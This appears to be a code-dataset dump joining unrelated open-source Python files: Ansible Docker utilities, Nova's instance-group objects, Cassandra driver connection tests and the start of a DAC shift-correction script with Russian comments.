if result is not None:
try:
self.log("Inspecting container Id %s" % result['Id'])
result = self.inspect_container(container=result['Id'])
self.log("Completed container inspection")
except NotFound as dummy:
return None
except Exception as exc:
self.fail("Error inspecting container: %s" % exc)
return result
def get_network(self, name=None, id=None):
'''
Lookup a network and return the inspection results.
'''
if name is None and id is None:
return None
result = None
if id is None:
try:
for network in self.networks():
self.log("testing network: %s" % (network['Name']))
if name == network['Name']:
result = network
break
if network['Id'].startswith(name):
result = network
break
except SSLError as exc:
self._handle_ssl_error(exc)
except Exception as exc:
self.fail("Error retrieving network list: %s" % exc)
if result is not None:
id = result['Id']
if id is not None:
try:
self.log("Inspecting network Id %s" % id)
result = self.inspect_network(id)
self.log("Completed network inspection")
except NotFound as dummy:
return None
except Exception as exc:
self.fail("Error inspecting network: %s" % exc)
return result
def find_image(self, name, tag):
'''
Lookup an image (by name and tag) and return the inspection results.
'''
if not name:
return None
self.log("Find image %s:%s" % (name, tag))
images = self._image_lookup(name, tag)
if len(images) == 0:
            # In API <= 1.20, images pulled from Docker Hub may show up under the name 'docker.io/<name>'
registry, repo_name = auth.resolve_repository_name(name)
if registry == 'docker.io':
# If docker.io is explicitly there in name, the image
# isn't found in some cases (#41509)
self.log("Check for docker.io image: %s" % repo_name)
images = self._image_lookup(repo_name, tag)
if len(images) == 0 and repo_name.startswith('library/'):
# Sometimes library/xxx images are not found
lookup = repo_name[len('library/'):]
self.log("Check for docker.io image: %s" % lookup)
images = self._image_lookup(lookup, tag)
if len(images) == 0:
# Last case: if docker.io wasn't there, it can be that
# the image wasn't found either (#15586)
lookup = "%s/%s" % (registry, repo_name)
self.log("Check for docker.io image: %s" % lookup)
images = self._image_lookup(lookup, tag)
if len(images) > 1:
self.fail("Registry returned more than one result for %s:%s" % (name, tag))
if len(images) == 1:
try:
inspection = self.inspect_image(images[0]['Id'])
except Exception as exc:
self.fail("Error inspecting image %s:%s - %s" % (name, tag, str(exc)))
return inspection
self.log("Image %s:%s not found." % (name, tag))
return None
def find_image_by_id(self, id):
'''
Lookup an image (by ID) and return the inspection results.
'''
if not id:
return None
self.log("Find image %s (by ID)" % id)
try:
inspection = self.inspect_image(id)
except Exception as exc:
self.fail("Error inspecting image ID %s - %s" % (id, str(exc)))
return inspection
def _image_lookup(self, name, tag):
'''
Including a tag in the name parameter sent to the Docker SDK for Python images method
does not work consistently. Instead, get the result set for name and manually check
if the tag exists.
'''
try:
response = self.images(name=name)
except Exception as exc:
self.fail("Error searching for image %s - %s" % (name, str(exc)))
images = response
if tag:
lookup = "%s:%s" % (name, tag)
images = []
for image in response:
tags = image.get('RepoTags')
if tags and lookup in tags:
images = [image]
break
return images
def pull_image(self, name, tag="latest"):
'''
Pull an image
'''
self.log("Pulling image %s:%s" % (name, tag))
old_tag = self.find_image(name, tag)
try:
for line in self.pull(name, tag=tag, stream=True, decode=True):
self.log(line, pretty_print=True)
if line.get('error'):
if line.get('errorDetail'):
error_detail = line.get('errorDetail')
self.fail("Error pulling %s - code: %s message: %s" % (name,
error_detail.get('code'),
error_detail.get('message')))
else:
self.fail("Error pulling %s - %s" % (name, line.get('error')))
except Exception as exc:
self.fail("Error pulling image %s:%s - %s" % (name, tag, str(exc)))
new_tag = self.find_image(name, tag)
return new_tag, old_tag == new_tag
def report_warnings(self, result, warnings_key=None):
'''
Checks result of client operation for warnings, and if present, outputs them.
warnings_key should be a list of keys used to crawl the result dictionary.
For example, if warnings_key == ['a', 'b'], the function will consider
result['a']['b'] if these keys exist. If the result is a non-empty string, it
will be reported as a warning. If the result is a list, every entry will be
reported as a warning.
In most cases (if warnings are returned at all), warnings_key should be
['Warnings'] or ['Warning']. The default value (if not specified) is ['Warnings'].
'''
if warnings_key is None:
warnings_key = ['Warnings']
for key in warnings_key:
if not isinstance(result, Mapping):
return
result = result.get(key)
if isinstance(result, Sequence):
for warning in result:
self.module.warn('Docker warning: {0}'.format(warning))
elif isinstance(result, string_types) and result:
self.module.warn('Docker warning: {0}'.format(result))
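    # Illustrative sketch (not part of the original module): a create() result such
    # as {'Warnings': ['volume xyz is unused']} combined with the default
    # warnings_key ['Warnings'] makes report_warnings() emit one module.warn() call
    # per entry, while report_warnings(result, ['a', 'b']) would first crawl down to
    # result['a']['b'] and then apply the same string/list rules.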
def inspect_distribution(self, image):
'''
Get image digest by directly calling the Docker API when running Docker SDK < 4.0.0
since prior versions did not support accessing private repositories.
'''
if self.docker_py_version < LooseVersion('4.0.0'):
registry = auth.resolve_repository_name(image)[0]
header = auth.get_config_header(self, registry)
if header:
return self._result(self._get(
self._url('/distribution/{0}/json', image),
headers={'X-Registry-Auth': header}
), json=True)
return super(AnsibleDockerClient, self).inspect_distribution(image)
def compare_dict_allow_more_present(av, bv):
'''
Compare two dictionaries for whether every entry of the first is in the second.
'''
for key, value in av.items():
if key not in bv:
return False
if bv[key] != value:
return False
return True
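# Illustrative usage sketch (added for clarity, not part of the original module);
# the dictionaries below are made-up values:
def _example_compare_dict_allow_more_present():
    # every key/value pair of the first dict must appear unchanged in the second
    assert compare_dict_allow_more_present({'a': 1}, {'a': 1, 'b': 2})
    assert not compare_dict_allow_more_present({'a': 1}, {'a': 2, 'b': 2})
    assert not compare_dict_allow_more_present({'c': 3}, {'a': 1})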
def compare_generic(a, b, method, type):
'''
Compare values a and b as described by method and type.
Returns ``True`` if the values compare equal, and ``False`` if not.
``a`` is usually the module's parameter, while ``b`` is a property
of the current object. ``a`` must not be ``None`` (except for
``type == 'value'``).
Valid values for ``method`` are:
- ``ignore`` (always compare as equal);
- ``strict`` (only compare if really equal)
- ``allow_more_present`` (allow b to have elements which a does not have).
Valid values for ``type`` are:
- ``value``: for simple values (strings, numbers, ...);
- ``list``: for ``list``s or ``tuple``s where order matters;
- ``set``: for ``list``s, ``tuple``s or ``set``s where order does not
matter;
- ``set(dict)``: for ``list``s, ``tuple``s or ``sets`` where order does
not matter and which contain ``dict``s; ``allow_more_present`` is used
for the ``dict``s, and these are assumed to be dictionaries of values;
- ``dict``: for dictionaries of values.
'''
if method == 'ignore':
return True
# If a or b is None:
if a is None or b is None:
# If both are None: equality
if a == b:
return True
# Otherwise, not equal for values, and equal
# if the other is empty for set/list/dict
if type == 'value':
return False
# For allow_more_present, allow a to be None
if method == 'allow_more_present' and a is None:
return True
# Otherwise, the iterable object which is not None must have length 0
return len(b if a is None else a) == 0
# Do proper comparison (both objects not None)
if type == 'value':
return a == b
elif type == 'list':
if method == 'strict':
return a == b
else:
i = 0
for v in a:
while i < len(b) and b[i] != v:
i += 1
if i == len(b):
return False
i += 1
return True
elif type == 'dict':
if method == 'strict':
return a == b
else:
return compare_dict_allow_more_present(a, b)
elif type == 'set':
set_a = set(a)
set_b = set(b)
if method == 'strict':
return set_a == set_b
else:
return set_b >= set_a
elif type == 'set(dict)':
for av in a:
found = False
for bv in b:
if compare_dict_allow_more_present(av, bv):
found = True
break
if not found:
return False
if method == 'strict':
# If we would know that both a and b do not contain duplicates,
# we could simply compare len(a) to len(b) to finish this test.
# We can assume that b has no duplicates (as it is returned by
# docker), but we don't know for a.
for bv in b:
found = False
for av in a:
if compare_dict_allow_more_present(av, bv):
found = True
break
if not found:
return False
return True
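# Illustrative usage sketch (added for clarity, not part of the original module);
# the values below are made up to show how ``method`` and ``type`` interact:
def _example_compare_generic():
    # order is ignored for 'set' but honoured for 'list'
    assert compare_generic(['a', 'b'], ['b', 'a'], 'strict', 'set')
    assert not compare_generic(['a', 'b'], ['b', 'a'], 'strict', 'list')
    # 'allow_more_present' accepts extra entries on the active (b) side
    assert compare_generic({'k': 'v'}, {'k': 'v', 'x': 1}, 'allow_more_present', 'dict')
    assert not compare_generic({'k': 'v'}, {'k': 'v', 'x': 1}, 'strict', 'dict')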
class DifferenceTracker(object):
def __init__(self):
self._diff = []
def add(self, name, parameter=None, active=None):
self._diff.append(dict(
name=name,
parameter=parameter,
active=active,
))
def merge(self, other_tracker):
self._diff.extend(other_tracker._diff)
@property
def empty(self):
return len(self._diff) == 0
def get_before_after(self):
'''
Return texts ``before`` and ``after``.
'''
before = dict()
after = dict()
for item in self._diff:
before[item['name']] = item['active']
after[item['name']] = item['parameter']
return before, after
def has_difference_for(self, name):
'''
Returns a boolean if a difference exists for name
'''
return any(diff for diff in self._diff if diff['name'] == name)
def get_legacy_docker_container_diffs(self):
'''
Return differences in the docker_container legacy format.
'''
result = []
for entry in self._diff:
item = dict()
item[entry['name']] = dict(
parameter=entry['parameter'],
container=entry['active'],
)
result.append(item)
return result
def get_legacy_docker_diffs(self):
'''
Return differences in the docker_container legacy format.
'''
result = [entry['name'] for entry in self._diff]
return result
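# Illustrative usage sketch (added for clarity, not part of the original module);
# the parameter/active values are made up:
def _example_difference_tracker():
    tracker = DifferenceTracker()
    tracker.add('memory', parameter='256m', active='128m')
    assert not tracker.empty
    assert tracker.has_difference_for('memory')
    before, after = tracker.get_before_after()
    assert before == {'memory': '128m'} and after == {'memory': '256m'}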
def clean_dict_booleans_for_docker_api(data):
'''
Go doesn't like Python booleans 'True' or 'False', while Ansible is just
fine with them in YAML. As such, they need to be converted in cases where
we pass dictionaries to the Docker API (e.g. docker_network's
driver_options and docker_prune's filters).
'''
result = dict()
if data is not None:
for k, v in data.items():
if v is True:
v = 'true'
elif v is False:
v = 'false'
else:
v = str(v)
result[str(k)] = v
return result
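# Illustrative usage sketch (added for clarity, not part of the original module);
# the driver_options-style values are made up:
def _example_clean_dict_booleans_for_docker_api():
    options = {'enable_icc': True, 'mtu': 1500}
    assert clean_dict_booleans_for_docker_api(options) == {'enable_icc': 'true',
                                                           'mtu': '1500'}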
def convert_duration_to_nanosecond(time_str):
"""
Return time duration in nanosecond.
"""
if not isinstance(time_str, str):
raise ValueError('Missing unit in duration - %s' % time_str)
regex = re.compile(
r'^(((?P<hours>\d+)h)?'
r'((?P<minutes>\d+)m(?!s))?'
r'((?P<seconds>\d+)s)?'
r'((?P<milliseconds>\d+)ms)?'
r'((?P<microseconds>\d+)us)?)$'
)
parts = regex.match(time_str)
if not parts:
raise ValueError('Invalid time duration - %s' % time_str)
parts = parts.groupdict()
time_params = {}
for (name, value) in parts.items():
if value:
time_params[name] = int(value)
delta = timedelta(**time_params)
time_in_nanoseconds = (
delta.microseconds + (delta.seconds + delta.days * 24 * 3600) * 10 ** 6
) * 10 ** 3
return time_in_nanoseconds
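# Illustrative usage sketch (added for clarity, not part of the original module):
def _example_convert_duration_to_nanosecond():
    # 1m30s -> 90 seconds -> 90 * 10**9 nanoseconds
    assert convert_duration_to_nanosecond('1m30s') == 90 * 10 ** 9
    # a bare number has no unit and is rejected
    try:
        convert_duration_to_nanosecond('90')
    except ValueError:
        pass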
def parse_healthcheck(healthcheck):
"""
Return dictionary of healthcheck parameters and boolean if
healthcheck defined in image was requested to be disabled.
"""
if (not healthcheck) or (not healthcheck.get('test')):
return None, None
result = dict()
# All supported healthcheck parameters
options = dict(
test='test',
interval='interval',
timeout='timeout',
start_period='start_period',
retries='retries'
)
duration_options = ['interval', 'timeout', 'start_period']
for (key, value) in options.items():
if value in healthcheck:
if healthcheck.get(value) is None:
# due to recursive argument_spec, all keys are always present
# (but have default value None if not specified)
continue
if value in duration_options:
time = convert_duration_to_nanosecond(healthcheck.get(value))
if time:
result[key] = time
elif healthcheck.get(value):
result[key] = healthcheck.get(value)
if key == 'test':
if isinstance(result[key], (tuple, list)):
result[key] = [str(e) for e in result[key]]
else:
result[key] = ['CMD-SHELL', str(result[key])]
elif key == 'retries':
try:
result[key] = int(result[key])
except ValueError:
raise ValueError(
'Cannot parse number of retries for healthcheck. '
'Expected an integer, got "{0}".'.format(result[key])
)
if result['test'] == ['NONE']:
# If the user explicitly disables the healthcheck, return None
# as the healthcheck object, and set disable_healthcheck to True
return None, True
return result, False
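# Illustrative usage sketch (added for clarity, not part of the original module);
# the healthcheck dict below is a made-up example of module input:
def _example_parse_healthcheck():
    spec = {'test': 'curl --fail http://localhost/', 'interval': '30s',
            'timeout': '10s', 'retries': 3, 'start_period': None}
    result, disabled = parse_healthcheck(spec)
    assert result['test'] == ['CMD-SHELL', 'curl --fail http://localhost/']
    assert result['interval'] == 30 * 10 ** 9 and result['retries'] == 3
    assert disabled is False
    # an explicit ['NONE'] test disables the healthcheck defined in the image
    assert parse_healthcheck({'test': ['NONE']}) == (None, True)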
| gpl-3.0 | -8,445,795,930,743,039,000 | 39.136456 | 156 | 0.55323 | false |
devendermishrajio/nova | nova/objects/instance_group.py | 1 | 10292 | # Copyright (c) 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import uuidutils
from oslo_utils import versionutils
from nova.compute import utils as compute_utils
from nova import db
from nova import exception
from nova import objects
from nova.objects import base
from nova.objects import fields
LAZY_LOAD_FIELDS = ['hosts']
# TODO(berrange): Remove NovaObjectDictCompat
@base.NovaObjectRegistry.register
class InstanceGroup(base.NovaPersistentObject, base.NovaObject,
base.NovaObjectDictCompat):
# Version 1.0: Initial version
# Version 1.1: String attributes updated to support unicode
# Version 1.2: Use list/dict helpers for policies, metadetails, members
# Version 1.3: Make uuid a non-None real string
# Version 1.4: Add add_members()
# Version 1.5: Add get_hosts()
# Version 1.6: Add get_by_name()
# Version 1.7: Deprecate metadetails
# Version 1.8: Add count_members_by_user()
# Version 1.9: Add get_by_instance_uuid()
# Version 1.10: Add hosts field
VERSION = '1.10'
fields = {
'id': fields.IntegerField(),
'user_id': fields.StringField(nullable=True),
'project_id': fields.StringField(nullable=True),
'uuid': fields.UUIDField(),
'name': fields.StringField(nullable=True),
'policies': fields.ListOfStringsField(nullable=True),
'members': fields.ListOfStringsField(nullable=True),
'hosts': fields.ListOfStringsField(nullable=True),
}
def obj_make_compatible(self, primitive, target_version):
target_version = versionutils.convert_version_to_tuple(target_version)
if target_version < (1, 7):
# NOTE(danms): Before 1.7, we had an always-empty
# metadetails property
primitive['metadetails'] = {}
@staticmethod
def _from_db_object(context, instance_group, db_inst):
"""Method to help with migration to objects.
Converts a database entity to a formal object.
"""
# Most of the field names match right now, so be quick
for field in instance_group.fields:
if field in LAZY_LOAD_FIELDS:
continue
if field == 'deleted':
instance_group.deleted = db_inst['deleted'] == db_inst['id']
else:
instance_group[field] = db_inst[field]
instance_group._context = context
instance_group.obj_reset_changes()
return instance_group
def obj_load_attr(self, attrname):
# NOTE(sbauza): Only hosts could be lazy-loaded right now
if attrname != 'hosts':
raise exception.ObjectActionError(
action='obj_load_attr', reason='unable to load %s' % attrname)
self.hosts = self.get_hosts()
self.obj_reset_changes(['hosts'])
@base.remotable_classmethod
def get_by_uuid(cls, context, uuid):
db_inst = db.instance_group_get(context, uuid)
return cls._from_db_object(context, cls(), db_inst)
@base.remotable_classmethod
def get_by_name(cls, context, name):
# TODO(russellb) We need to get the group by name here. There's no
# db.api method for this yet. Come back and optimize this by
# adding a new query by name. This is unnecessarily expensive if a
# tenant has lots of groups.
igs = objects.InstanceGroupList.get_by_project_id(context,
context.project_id)
for ig in igs:
if ig.name == name:
return ig
raise exception.InstanceGroupNotFound(group_uuid=name)
@base.remotable_classmethod
def get_by_instance_uuid(cls, context, instance_uuid):
db_inst = db.instance_group_get_by_instance(context, instance_uuid)
return cls._from_db_object(context, cls(), db_inst)
@classmethod
def get_by_hint(cls, context, hint):
if uuidutils.is_uuid_like(hint):
return cls.get_by_uuid(context, hint)
else:
return cls.get_by_name(context, hint)
@base.remotable
def save(self):
"""Save updates to this instance group."""
updates = self.obj_get_changes()
# NOTE(sbauza): We do NOT save the set of compute nodes that an
# instance group is connected to in this method. Instance groups are
# implicitly connected to compute nodes when the
# InstanceGroup.add_members() method is called, which adds the mapping
# table entries.
# So, since the only way to have hosts in the updates is to set that
        # field explicitly, we prefer to raise an Exception so the developer
# knows he has to call obj_reset_changes(['hosts']) right after setting
# the field.
if 'hosts' in updates:
raise exception.InstanceGroupSaveException(field='hosts')
if not updates:
return
payload = dict(updates)
payload['server_group_id'] = self.uuid
db.instance_group_update(self._context, self.uuid, updates)
db_inst = db.instance_group_get(self._context, self.uuid)
self._from_db_object(self._context, self, db_inst)
compute_utils.notify_about_server_group_update(self._context,
"update", payload)
@base.remotable
def refresh(self):
"""Refreshes the instance group."""
current = self.__class__.get_by_uuid(self._context, self.uuid)
for field in self.fields:
if self.obj_attr_is_set(field) and self[field] != current[field]:
self[field] = current[field]
self.obj_reset_changes()
@base.remotable
def create(self):
if self.obj_attr_is_set('id'):
raise exception.ObjectActionError(action='create',
reason='already created')
updates = self.obj_get_changes()
payload = dict(updates)
updates.pop('id', None)
policies = updates.pop('policies', None)
members = updates.pop('members', None)
db_inst = db.instance_group_create(self._context, updates,
policies=policies,
members=members)
self._from_db_object(self._context, self, db_inst)
payload['server_group_id'] = self.uuid
compute_utils.notify_about_server_group_update(self._context,
"create", payload)
@base.remotable
def destroy(self):
payload = {'server_group_id': self.uuid}
db.instance_group_delete(self._context, self.uuid)
self.obj_reset_changes()
compute_utils.notify_about_server_group_update(self._context,
"delete", payload)
@base.remotable_classmethod
def add_members(cls, context, group_uuid, instance_uuids):
payload = {'server_group_id': group_uuid,
'instance_uuids': instance_uuids}
members = db.instance_group_members_add(context, group_uuid,
instance_uuids)
compute_utils.notify_about_server_group_update(context,
"addmember", payload)
return list(members)
@base.remotable
def get_hosts(self, exclude=None):
"""Get a list of hosts for non-deleted instances in the group
This method allows you to get a list of the hosts where instances in
this group are currently running. There's also an option to exclude
certain instance UUIDs from this calculation.
"""
filter_uuids = self.members
if exclude:
filter_uuids = set(filter_uuids) - set(exclude)
filters = {'uuid': filter_uuids, 'deleted': False}
instances = objects.InstanceList.get_by_filters(self._context,
filters=filters)
return list(set([instance.host for instance in instances
if instance.host]))
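    # Illustrative sketch (not part of the original module):
    #   group = objects.InstanceGroup.get_by_uuid(ctxt, group_uuid)
    #   hosts = group.get_hosts(exclude=[migrating_uuid])
    # returns the hosts of all other non-deleted members, which is what
    # anti-affinity checks need while one member is being rescheduled
    # (ctxt, group_uuid and migrating_uuid are assumed placeholders).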
@base.remotable
def count_members_by_user(self, user_id):
"""Count the number of instances in a group belonging to a user."""
filter_uuids = self.members
filters = {'uuid': filter_uuids, 'user_id': user_id, 'deleted': False}
instances = objects.InstanceList.get_by_filters(self._context,
filters=filters)
return len(instances)
@base.NovaObjectRegistry.register
class InstanceGroupList(base.ObjectListBase, base.NovaObject):
# Version 1.0: Initial version
# InstanceGroup <= version 1.3
# Version 1.1: InstanceGroup <= version 1.4
# Version 1.2: InstanceGroup <= version 1.5
# Version 1.3: InstanceGroup <= version 1.6
# Version 1.4: InstanceGroup <= version 1.7
# Version 1.5: InstanceGroup <= version 1.8
# Version 1.6: InstanceGroup <= version 1.9
# Version 1.7: InstanceGroup <= version 1.10
VERSION = '1.7'
fields = {
'objects': fields.ListOfObjectsField('InstanceGroup'),
}
@base.remotable_classmethod
def get_by_project_id(cls, context, project_id):
groups = db.instance_group_get_all_by_project_id(context, project_id)
return base.obj_make_list(context, cls(context), objects.InstanceGroup,
groups)
@base.remotable_classmethod
def get_all(cls, context):
groups = db.instance_group_get_all(context)
return base.obj_make_list(context, cls(context), objects.InstanceGroup,
groups)
| apache-2.0 | -7,126,459,705,232,050,000 | 39.046693 | 79 | 0.610668 | false |
vipjml/python-driver | tests/integration/standard/test_connection.py | 2 | 13526 | # Copyright 2013-2016 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
from functools import partial
from six.moves import range
import sys
from threading import Thread, Event
import time
from cassandra import ConsistencyLevel, OperationTimedOut
from cassandra.cluster import NoHostAvailable, Cluster
from cassandra.io.asyncorereactor import AsyncoreConnection
from cassandra.protocol import QueryMessage
from cassandra.connection import Connection
from cassandra.policies import WhiteListRoundRobinPolicy, HostStateListener
from cassandra.pool import HostConnectionPool
from tests import is_monkey_patched
from tests.integration import use_singledc, PROTOCOL_VERSION, get_node
try:
from cassandra.io.libevreactor import LibevConnection
except ImportError:
LibevConnection = None
def setup_module():
use_singledc()
class ConnectionTimeoutTest(unittest.TestCase):
def setUp(self):
self.defaultInFlight = Connection.max_in_flight
Connection.max_in_flight = 2
self.cluster = Cluster(protocol_version=PROTOCOL_VERSION, load_balancing_policy=WhiteListRoundRobinPolicy(['127.0.0.1']))
self.session = self.cluster.connect()
def tearDown(self):
Connection.max_in_flight = self.defaultInFlight
self.cluster.shutdown()
def test_in_flight_timeout(self):
"""
        Test to ensure that connection id fetching will block when max_id is reached.
        In previous versions of the driver this test would cause a
        NoHostAvailable exception to be thrown when the max_id was restricted
@since 3.3
@jira_ticket PYTHON-514
@expected_result When many requests are run on a single node connection acquisition should block
until connection is available or the request times out.
@test_category connection timeout
"""
futures = []
query = '''SELECT * FROM system.local'''
for i in range(100):
futures.append(self.session.execute_async(query))
for future in futures:
future.result()
class TestHostListener(HostStateListener):
host_down = None
def on_down(self, host):
        self.host_down = host
class HeartbeatTest(unittest.TestCase):
"""
Test to validate failing a heartbeat check doesn't mark a host as down
@since 3.3
@jira_ticket PYTHON-286
@expected_result host should not be marked down when heartbeat fails
@test_category connection heartbeat
"""
def setUp(self):
self.cluster = Cluster(protocol_version=PROTOCOL_VERSION, idle_heartbeat_interval=1)
self.session = self.cluster.connect(wait_for_all_pools=True)
def tearDown(self):
self.cluster.shutdown()
def test_heart_beat_timeout(self):
# Setup a host listener to ensure the nodes don't go down
test_listener = TestHostListener()
host = "127.0.0.1"
node = get_node(1)
initial_connections = self.fetch_connections(host, self.cluster)
self.assertNotEqual(len(initial_connections), 0)
self.cluster.register_listener(test_listener)
# Pause the node
try:
node.pause()
# Wait for connections associated with this host go away
self.wait_for_no_connections(host, self.cluster)
# Resume paused node
finally:
node.resume()
# Run a query to ensure connections are re-established
current_host = ""
count = 0
while current_host != host and count < 100:
rs = self.session.execute_async("SELECT * FROM system.local", trace=False)
rs.result()
current_host = str(rs._current_host)
count += 1
time.sleep(.1)
self.assertLess(count, 100, "Never connected to the first node")
new_connections = self.wait_for_connections(host, self.cluster)
self.assertIsNone(test_listener.host_down)
# Make sure underlying new connections don't match previous ones
for connection in initial_connections:
self.assertFalse(connection in new_connections)
def fetch_connections(self, host, cluster):
# Given a cluster object and host grab all connection associated with that host
connections = []
holders = cluster.get_connection_holders()
for conn in holders:
if host == str(getattr(conn, 'host', '')):
if isinstance(conn, HostConnectionPool):
if conn._connections is not None and len(conn._connections) > 0:
connections.append(conn._connections)
else:
if conn._connection is not None:
connections.append(conn._connection)
return connections
def wait_for_connections(self, host, cluster):
retry = 0
while(retry < 300):
retry += 1
connections = self.fetch_connections(host, cluster)
            if len(connections) != 0:
return connections
time.sleep(.1)
self.fail("No new connections found")
def wait_for_no_connections(self, host, cluster):
retry = 0
while(retry < 100):
retry += 1
connections = self.fetch_connections(host, cluster)
            if len(connections) == 0:
return
time.sleep(.5)
self.fail("Connections never cleared")
class ConnectionTests(object):
klass = None
def setUp(self):
self.klass.initialize_reactor()
def get_connection(self, timeout=5):
"""
Helper method to solve automated testing issues within Jenkins.
Officially patched under the 2.0 branch through
17998ef72a2fe2e67d27dd602b6ced33a58ad8ef, but left as is for the
1.0 branch due to possible regressions for fixing an
automated testing edge-case.
"""
conn = None
e = None
for i in range(5):
try:
conn = self.klass.factory(host='127.0.0.1', timeout=timeout, protocol_version=PROTOCOL_VERSION)
break
except (OperationTimedOut, NoHostAvailable) as e:
continue
if conn:
return conn
else:
raise e
def test_single_connection(self):
"""
Test a single connection with sequential requests.
"""
conn = self.get_connection()
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
event = Event()
def cb(count, *args, **kwargs):
count += 1
if count >= 10:
conn.close()
event.set()
else:
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=0,
cb=partial(cb, count))
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=0,
cb=partial(cb, 0))
event.wait()
def test_single_connection_pipelined_requests(self):
"""
Test a single connection with pipelined requests.
"""
conn = self.get_connection()
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
responses = [False] * 100
event = Event()
def cb(response_list, request_num, *args, **kwargs):
response_list[request_num] = True
if all(response_list):
conn.close()
event.set()
for i in range(100):
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=i,
cb=partial(cb, responses, i))
event.wait()
def test_multiple_connections(self):
"""
Test multiple connections with pipelined requests.
"""
conns = [self.get_connection() for i in range(5)]
events = [Event() for i in range(5)]
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
def cb(event, conn, count, *args, **kwargs):
count += 1
if count >= 10:
conn.close()
event.set()
else:
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=count,
cb=partial(cb, event, conn, count))
for event, conn in zip(events, conns):
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=0,
cb=partial(cb, event, conn, 0))
for event in events:
event.wait()
def test_multiple_threads_shared_connection(self):
"""
Test sharing a single connections across multiple threads,
which will result in pipelined requests.
"""
num_requests_per_conn = 25
num_threads = 5
event = Event()
conn = self.get_connection()
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
def cb(all_responses, thread_responses, request_num, *args, **kwargs):
thread_responses[request_num] = True
if all(map(all, all_responses)):
conn.close()
event.set()
def send_msgs(all_responses, thread_responses):
for i in range(num_requests_per_conn):
qmsg = QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE)
with conn.lock:
request_id = conn.get_request_id()
conn.send_msg(qmsg, request_id, cb=partial(cb, all_responses, thread_responses, i))
all_responses = []
threads = []
for i in range(num_threads):
thread_responses = [False] * num_requests_per_conn
all_responses.append(thread_responses)
t = Thread(target=send_msgs, args=(all_responses, thread_responses))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
event.wait()
def test_multiple_threads_multiple_connections(self):
"""
Test several threads, each with their own Connection and pipelined
requests.
"""
num_requests_per_conn = 25
num_conns = 5
events = [Event() for i in range(5)]
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
def cb(conn, event, thread_responses, request_num, *args, **kwargs):
thread_responses[request_num] = True
if all(thread_responses):
conn.close()
event.set()
def send_msgs(conn, event):
thread_responses = [False] * num_requests_per_conn
for i in range(num_requests_per_conn):
qmsg = QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE)
with conn.lock:
request_id = conn.get_request_id()
conn.send_msg(qmsg, request_id, cb=partial(cb, conn, event, thread_responses, i))
event.wait()
threads = []
for i in range(num_conns):
conn = self.get_connection()
t = Thread(target=send_msgs, args=(conn, events[i]))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
def test_connect_timeout(self):
# Underlying socket implementations don't always throw a socket timeout even with min float
# This can be timing sensitive, added retry to ensure failure occurs if it can
max_retry_count = 10
exception_thrown = False
for i in range(max_retry_count):
start = time.time()
try:
self.get_connection(timeout=sys.float_info.min)
except Exception as e:
end = time.time()
self.assertAlmostEqual(start, end, 1)
exception_thrown = True
break
self.assertTrue(exception_thrown)
class AsyncoreConnectionTests(ConnectionTests, unittest.TestCase):
klass = AsyncoreConnection
def setUp(self):
if is_monkey_patched():
raise unittest.SkipTest("Can't test asyncore with monkey patching")
ConnectionTests.setUp(self)
class LibevConnectionTests(ConnectionTests, unittest.TestCase):
klass = LibevConnection
def setUp(self):
if is_monkey_patched():
raise unittest.SkipTest("Can't test libev with monkey patching")
if LibevConnection is None:
raise unittest.SkipTest(
'libev does not appear to be installed properly')
ConnectionTests.setUp(self)
| apache-2.0 | 6,823,360,571,779,303,000 | 33.156566 | 129 | 0.605353 | false |
zaqwes8811/matlab_ext | measurement/mc-assistant/projects/py_hw_models/shift_correction_model.py | 1 | 5592 | #-*- coding: utf-8 -*-
""" Convention :
    cu - conventional unit - one step of the output code
"""
import sys
import math
# Other
import convertors_simple_data_types.xintyy_type_convertors as tc
import convertors_simple_data_types.float32_convertors as f32conv
from py_dbg_toolkit.doColoredConsole import co
import uasio.os_io.io_wrapper as iow
def _print_formatter(string):
string = '0x'+string
return string[:-1].replace(' ', ', 0x')
def _hex_word_to_int(hexWord):
sum = 0
for pos in range(0, len(hexWord)):
oneIt = tc.hex2int(hexWord[pos])*math.pow(16, len(hexWord)-pos-1)
sum += oneIt
return sum
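# Illustrative sketch (added for clarity, not part of the original script):
#   _print_formatter('1A 2B ') -> '0x1A, 0x2B'
#   _hex_word_to_int('0111') -> 273.0 (0*16**3 + 1*16**2 + 1*16 + 1)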
def calc_for_ukv(
    correcting_mult, # temperature coefficient, V/oC
    T, # temperature, 8 bits, one bit per degree
    src_shift_code # default shift-setting code value taken from the EEPROM
):
    # We close off the global namespace here
# constants
_kSets = { 'name': 'convertion.log', 'howOpen': 'a', 'coding': 'cp1251'}
    _kOutProportion = 4000/4.6 # cu/V - the value loaded into the DAC
""" Метод отображения результатов и плагины для вывода на комм. строку
notes. : Низший модуль передает полностью всю информацию. Потом можно разбить
регулярными выражениями
